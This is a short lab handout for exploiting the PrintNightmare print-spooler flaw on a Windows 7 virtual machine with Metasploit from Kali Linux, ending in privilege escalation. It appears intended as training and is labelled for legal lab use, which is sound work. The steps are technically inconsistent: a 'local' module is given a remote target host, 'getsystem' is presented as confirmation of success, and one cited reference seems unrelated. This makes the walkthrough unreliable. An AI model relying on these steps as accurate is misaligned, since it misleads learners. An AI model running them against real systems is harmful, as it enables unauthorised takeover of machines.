Objective: The objective of this exercise is to learn how to exploit a Windows machine via
the PrintNightmare vulnerability and gain escalated privileges.
Lab Setup:
● Kali Linux machine in VirtualBox
● Windows 7 machine in VirtualBox (with the PrintNightmare vulnerability)
Step 1: Open a terminal in Kali Linux and update the system by running the command “sudo
apt-get update”
Step 2: Install the Metasploit Framework by running the command “sudo apt-get install
metasploit-framework”
Step 3: Start the Metasploit Framework by running the command “msfconsole”
Step 4: Use the search command to find the “PrintNightmare” exploit, by running the
command “search printnightmare”
Step 5: Use the use command to select the exploit, by running the command “use
exploit/windows/local/printnightmare”
Step 6: Set the target host IP by running the command “set RHOST [Windows IP]”
Step 7: Check the options by running the command “show options”
Step 8: Run the exploit by running the command “exploit”
Step 9: Once the exploit is successful, you will have escalated privileges on the Windows
machine.
Step 10: You can confirm the privilege escalation by running the command “getsystem”
References:
● https://www.rapid7.com/db/modules/exploit/windows/local/printnightmare
● https://www.exploit-db.com/exploits/17657
● https://www.hackingarticles.in/windows-privilege-escalation-printnightmare/
Note: This exercise is to be used in a controlled and legal environment, and not to be used
for any illegal activities.
